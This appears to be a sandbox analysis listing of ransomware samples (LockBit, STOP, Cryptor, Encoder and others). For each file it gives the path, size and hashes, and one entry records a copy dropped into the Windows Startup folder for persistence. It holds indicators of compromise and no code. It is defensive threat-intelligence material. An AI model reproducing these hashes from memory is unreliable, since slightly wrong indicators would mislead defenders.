SHA2561ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9
SHA51232a8d6f2fa1e472aefa8cc41cb59b5b67e84d336ca35c5b1f5d2a2ad2eae5a7ba1cbfba17f75261b0220a5d896b72bb4b95c5c86a6c8bda4b9bf50463f2222fc
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe
Filesize911KB
MD5835f242dde220cc76ee5544119562268
SHA18118474606a68c03581eef85a05a90275aa1ec24
SHA256dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
SHA5124fadf14fd5d1ef5948477185e4d2a8a00414f63c7db8fc440c7b28c8f288e29df4447f2a9cf61b2778c8af1d68261c9ff5bebd4c36d69b33715e66f06acb2539
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe
Filesize4.0MB
MD53fc6dbd32666e3234babc1d5a08d8fb6
SHA153199e7b0f84bdf6612b853302e996f3f2309456
SHA25611e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd
SHA5127e9efe85f4a6fe9000eb15d1f93e40ad45e7b515448977568e56222b1d76584179376a7b8d040677eb819b9752fe11510e577f601dfe533e4f613a3c761044c2
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe
Filesize89KB
MD53822d0484ec81d615a0913c398ad1f83
SHA1b7bd3e90724189c7316b82a70ce85e0a91855089
SHA25627a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8
SHA512d103abe81ef9bba19a3f21c8a2742b6a6dad2d147bb440e81b1f17b1d0f67fc3dfa4c33c84ec8b7ca1b107fbd91535ee588d29bded615cff58685eb611665fe8
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Generic-8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe
Filesize142KB
MD5e1f063d63a75e0e0e864052b1a50ab06
SHA175d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
SHA2568c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
SHA51225681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Lockbit.vho-b7a17d6f314fa58a8f36b9b15b730ed4f9dde19bc00101f9b0433c733d4d54bb.exe
Filesize146KB
MD5cce95a5ac15dbaa10a2565af05820c15
SHA1812fc39248bd33584fc836fdbc8712bca63b6b59
SHA256b7a17d6f314fa58a8f36b9b15b730ed4f9dde19bc00101f9b0433c733d4d54bb
SHA512636c7cf8532f0b531e901558672a9f281a65521c52f5f7709686abe2742611e2348bdc0e14d70f7c108aa63c2c84f7a039754335ef690298f2c4a94645e6dc54
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Stop.gen-25b21e9e98f55e0e430637560ada56b5eb7d68b69c486c188f233cc83b1bae53.exe
Filesize648KB
MD56faf5a8adf946366ee73024974f6dee1
SHA1e8ca76c23c228e788e9db7792727e3fb9805c0e3
SHA25625b21e9e98f55e0e430637560ada56b5eb7d68b69c486c188f233cc83b1bae53
SHA512ca736d6aa1540247ce2f6f2ba80cbfa1ae834065a4c1116b2f4d5b2a40440c5932806574963f4b78f340c8baafd89a7f128c171c384e1af46f012fd3c0ac8eec
-
C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Blocker.lckf-98c71b2a09aac619e6216958b003368bb896f8c7f18affe28a5756e0442f1096.exe
Filesize112KB
MD5c427138d70d3fa5efce7f21360d231ed
SHA129b88c56300b7bb856e51baca7f2a7504f3d7291
SHA25698c71b2a09aac619e6216958b003368bb896f8c7f18affe28a5756e0442f1096
SHA512a9678d9ba8bb8d1fb971c644e6e8f48c0ae5442990d1519407684e8a04c0cd72cfea0479c4bb568d877a213409557ae19b4e24df58addb8b6449ce6a703ecb8f
-
C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Cryptor.eeu-353f3cad40f4deec18261c649f07e018fdd592b706f6aed709d7cb5ab3844715.exe
Filesize7.2MB
MD5d97abc9fedf925161dc0016fc76a5c7c
SHA10e3f978041d44bdf4e171631da5df0d68c98df6c
SHA256353f3cad40f4deec18261c649f07e018fdd592b706f6aed709d7cb5ab3844715
SHA5122e8d6a8ce9f6b80413b8a18ad92dd391cbd2f115cae8c938b8ce7e0053d7f1d88948e8122e7960775fc94a477be67ff1c8b5855079a7b63041657cede1b1ed1b
-
C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
Filesize56KB
MD50240d59b0275e347fb5c3916cc8720e6
SHA1db0d2e3197da4944cc20b8b62be0d1750b796451
SHA25656e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a
SHA512e8dcd70f50f35bd0a8933a9d065ffa498a03cd499efbc2c4931e89af8b20b7e9384cf95da394422e5c176e3de7ba7d96c3672e2107e2fb1945bd121ed58b3d59
-
C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Encoder.mhm-097d28021ffb26cb5b7d2d1377578cd6e2005549e44b5b2491fd310ecf50f7a8.exe
Filesize2.1MB
MD50ef0070dfc132fc368c950f0bef762a3
SHA1572c864dfc9160e5aef2dcc9359bf909ca4ba1c5
SHA256097d28021ffb26cb5b7d2d1377578cd6e2005549e44b5b2491fd310ecf50f7a8
SHA512487062105c1af064fed38285aacd155971e29e295ac963619c4d3175677b3639d6d6c44a0925ba31a1eca99a1866d5be22234c2918d5db0919c32cace70ad83b
-
C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Gen.adag-12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Filesize59KB
MD5c830512579b0e08f40bc1791fc10c582
SHA12fc8514367d4799d90311b1b1f277b3fca5ca731
SHA25612ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975
SHA512b8e7dc2b26ff00c43dae3e5ceb2b241bc7211c52fba167f1dfd81b285461fd53668953ede798a5f4fd1c587ee9861c2ca0fd034a958428dd3d9f5177c61b5ca3
-
C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.GenericCryptor.czx-4b1e7a0c585492340c9e57afc4c7dd6570acb704f0b6763c5e63dd99eee2fa8b.exe
Filesize336KB
MD55f964bd649a0cbc133ba2abaf9245022
SHA1e2db196fa959d76bce93edc006c7b1f284ffcde4
SHA2564b1e7a0c585492340c9e57afc4c7dd6570acb704f0b6763c5e63dd99eee2fa8b
SHA5124bd9b37366d3c81da797baad0843fc0862825cf2f0b54cf5c74955d18e4980c07f057abd3166634de14b88d1d03708562d2c1cfb5f4c1a1f8248d24c7d0720ec
-
Filesize
1.4MB
MD56d94422fc9e5c4b1de601dcc88ecb41e
SHA18ff481aaa065863a681f9a13fffa38cf9415ef43
SHA256516c1e154e752e7b4f1943bffe07f51433facd184474a36f041cd535bb413923
SHA5125319e75538d08e118446e94cc7d36bce5567532a4d1fd95eef9949b1a805c1ef6638063a1200dfaf22ba27c220128451a168bda63349c97cfb585f782a61a2dd
-
Filesize
511KB
MD5c20b6d4b0863993510d666c9ed3dcdc7
SHA1cbe6ee131fc55aeef5c9ae0a5f5de994edb3fe79
SHA256b6ec37c45f74bc5a93881b91239b925f97bfc0b0579a02579446b946de51d671
SHA512c1e5b66f1db37294a40e25febb740c875cbf26d30dd22004b28817073360994613a5c08c681c2676005c6ba9e9c3504c91d9afb04c85ca5eef5734eeecd5fb56
-
Filesize
604KB
MD59db8dd7ee4c00c1d04dbd358150d5e14
SHA128f43e4fbe755435b16384395c01ea1c364f0910
SHA25684c7c868c2817cc6aa2714ee724abd48e224f33592970b64dbdf562865ded1e0
SHA51271312ad0ce8fb28060c3776762b2aaa4f203ee87b03ab6617e1e0fc2153e1a10e8991b8f97b649ffec1ef7ab7ffc43cffd7e0c4d06f14f69849fdfbb36bda326
-
Filesize
913KB
MD59cdc791432a55dc26d3bd087e1549446
SHA131a0e7c7a68225345e91b898417a2a83dcdcc806
SHA2562c4f7653f9246a3aa0fff5c97fc62a817a42780a47d0a95834ed1580f0941e7a
SHA5127878ebdf155aa3218925fb18022de49f87376a07b113feaeb0a3a8215f734d08e1d85d5c520108916eb7b8815e8b109b60a574b150b7ea640f9cd4b3b39ba0f4
-
Filesize
2KB
MD52a0411da8e24b6809d34b443fb416103
SHA18aa27847b46f2066514305d6fb44d757771a0a35
SHA2561cfd9fde27cc70e805d56314f9af723b26aa0770d906d038232b43cbcf69badf
SHA512ededfcb63d8051680276940d73b08ca2014edb28834565d816e4f2dbdb4fdcb1e8163a6adb02ae5ce12cb535044e423790300f72fa4bfb53fef5210c00ea6915
-
Filesize
696B
MD504953efe5ce48616b2acd837accd6eb8
SHA1f7e7df61c8556a9df22208114c9d77c50b882731
SHA256dafc32c6ba65f27943b0e7e1c6f714a0c909904fb3156e7123f8a978f0948cd4
SHA512888a80330ec599e48a6bba56f709c3bb2ee12a9d582d45d861d42845cc65d0df1b7b9c84d41395abdae88204d5dbf4876767891a062a7951eb059f19a063b523
-
Filesize
1KB
MD5e6f056e656b3cf4d764b03092640e3f1
SHA11da342a77f74c45a253e4a7801ca4b25712429e1
SHA2560151ee0cbf380df8705e7dc0961ee6c5b661962d29a8e9c6b51680854f97c0df
SHA512f6de607ea6a91dc151968ea0351021678c499bf676dc04c53436341f301d48db987d3ea4310d7a43749a9bb3739dc6a297514569e7c11255ecb6a8096136940d
-
Filesize
1KB
MD5f9a30fed2e8c168dd9a5638f6f890d8d
SHA1690f8fbfa8bcd36bdd22295a541cf1db382cc80d
SHA25685caa5de9e3a110cbaeab687cb59162fc81c9a581dcb6459154613f502b979c5
SHA512825fb63c57dc7218f82ab98527db7949eec0789b774058ace39fe9f1529d40b646d1661f8783d306e84ac1dc3343a5d4028240ae97e54f981020a8818795d012
-
\??\c:\programdata\microsoft\windows\start menu\programs\startup\heur-trojan-ransom.win32.generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe.62d7ba854c61da17f04364138306b5baa2766d5690753ee4d8f5b86020388cc2
Filesize4.0MB
MD5deeaca7273cb61de657e5eb9567fc7e7
SHA16f7df2af5fdb0198444ef7dcb19835cfb575064c
SHA256967a04da5626d34fffa833a0f84b8d4f37753ca2751f73b677a8214172ad5a24
SHA512bb1cc3ff1cbaafddfa5e5728ffd6db7bf164381aee90ca1f429600144ed8fd4d223f311c01dd6a4ead81767967acd8e64c2e9c01a65936035ddf92266574f193
-
\??\c:\users\admin\desktop\00434\trojan-ransom.win32.genericcryptor.czo-96c8c4c4267b3f070a4c5480380b913e7cbc1b8103809575070c262aa8c843cc.exe
Filesize89KB
MD589373ded9b6dcb755ccd08f3217d560f
SHA19f121ce2b294c3484c69c2290c92d98d031ede2a
SHA25696c8c4c4267b3f070a4c5480380b913e7cbc1b8103809575070c262aa8c843cc
SHA512964df4e896b8873e2f8fa14d79e329113dcbc2339b02d8fd237ce24604f750e21605a30e9438480c5a4622d8d78e05eead0657d54c400260b168c4f12ad3b84f